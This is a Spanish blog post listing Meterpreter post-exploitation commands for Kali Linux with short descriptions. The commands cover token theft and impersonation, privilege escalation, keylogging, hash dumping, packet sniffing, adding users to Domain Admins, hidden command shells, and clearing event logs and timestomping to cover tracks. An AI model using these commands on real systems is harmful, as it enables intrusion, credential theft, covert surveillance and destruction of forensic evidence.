Advertisement

header ads

Comandos de Meterpreter EN KALI LINUX

Últimamente se publico comandos para Kali Linux pero estuve jugando con algunos comandos de metepreter donde personas tienen derecho de aprender y conocerlas un poco. Espero con los comandos te ayuden.



Los siguientes comandos:
helpAbrir uso ayuda Meterpreter
run scriptname – Ejecutar Meterpreter-basado en scripts, para obtener una lista completa de scripts/meterpreter en el directorio.
sysinfoMostrar la información del sistema en el destino remoto.
ls Lista de archivos y carpetas en el objetivo.
use privCargue el privilegio de la extensión para extender la librería del Meterpreter.
psMostrar todos los procesos en ejecución y que las cuentas estén asociadas con cada proceso.
migrate PID – Migrar específicamente el proceso de ID (PID es el objetivo del proceso ID  ganado desde el comandos PS)
use incognitoCargar funciones incógnitas. (Se utiliza para robar fichas y suplantación de una máquina de destino)
list_tokens -uLista fichas disponibles en el objetivo por el usuario.
list_tokens -gLista fichas disponibles en el objetivo por el grupo.
impersonate_token DOMAIN_NAME\\USERNAMEHacerse pasar por una ficha disponible en el objetivo.
steal_token PIDRobar las fichas disponibles para un determinado proceso y hacerse pasar por esa señal.
drop_tokenDeje de hacerse pasar por el token actual.
getsystemIntento de elevar los permisos de acceso a nivel de sistema a través de múltiples vectores de ataque.
shellCaer en un shell interactivo con todas las fichas disponibles.
execute -f cmd.exe -iEjecutar cmd.exe e interactuar con él.
execute -f cmd.exe -i -tEjecutar cmd.exe con todas las fichas disponibles.
execute -f cmd.exe -i -H -t  – Ejecutar cmd.exe con todas las fichas disponibles y convertirlo en un proceso oculto.
rev2selfVolver al usuario original que utilizó para poner en peligro el objetivo.
reg commandInteractuar, crear, eliminar, consultar, set, y mucho más en el registro del destino.
setdesktop numberCambiar a una pantalla diferente en función de quién está conectado.
screenshotTome una captura de pantalla de la pantalla del destino.
upload file  –  Subir un archivo a la objetivo.
download file – Descargar los archivos desde el objetivo.
keyscan_startdetecte las pulsaciones de teclado en el destino remoto.
keyscan_dumpVolcar las teclas remotas capturados en el objetivo.
keyscan_stopDeje de detectar las pulsaciones de teclado en el destino remoto.
getprivsObtener tantos privilegios como sea posible en el objetivo.
uictl enable keyboard/mouseToma el control del teclado y/o ratón.
backgroundEjecute su shell actual Meterpreter en el fondo.
hashdump – Volcar todos los hashes en el objetivo.
use snifferCargue el módulo sniffer.
sniffer_interfacesLista de  interfaces disponibles al objetivo.
sniffer_dump interfaceID pcapnameComience sniffer en el destino remoto.
sniffer_start interfaceID packet-bufferComience sniffer  con una gama específica para un buffer de paquetes.
sniffer_stats interfaceIDCoge la información de estadística de la interfaz que está en sniffer.
sniffer_stop interfaceIDDetenga el sniffer D:
add_user username password -h ipAgregar un usuario en el destino remoto.
add_group_user “Domain Admins” username -h ipAñadir un nombre de usuario al grupo Administradores de dominio en el destino remoto.
clearevBorrar el registro de eventos en el equipo de destino.
timestompCambiar atributos de archivo, como fecha de creación (antiforensics medida)
rebootReinicie el equipo de destino.
Bueno si conoce algunos comandos más déjalo abajo en los comentario para agregarlo. Y espero que se divierta con sus meterpreter

Publicar un comentario

0 Comentarios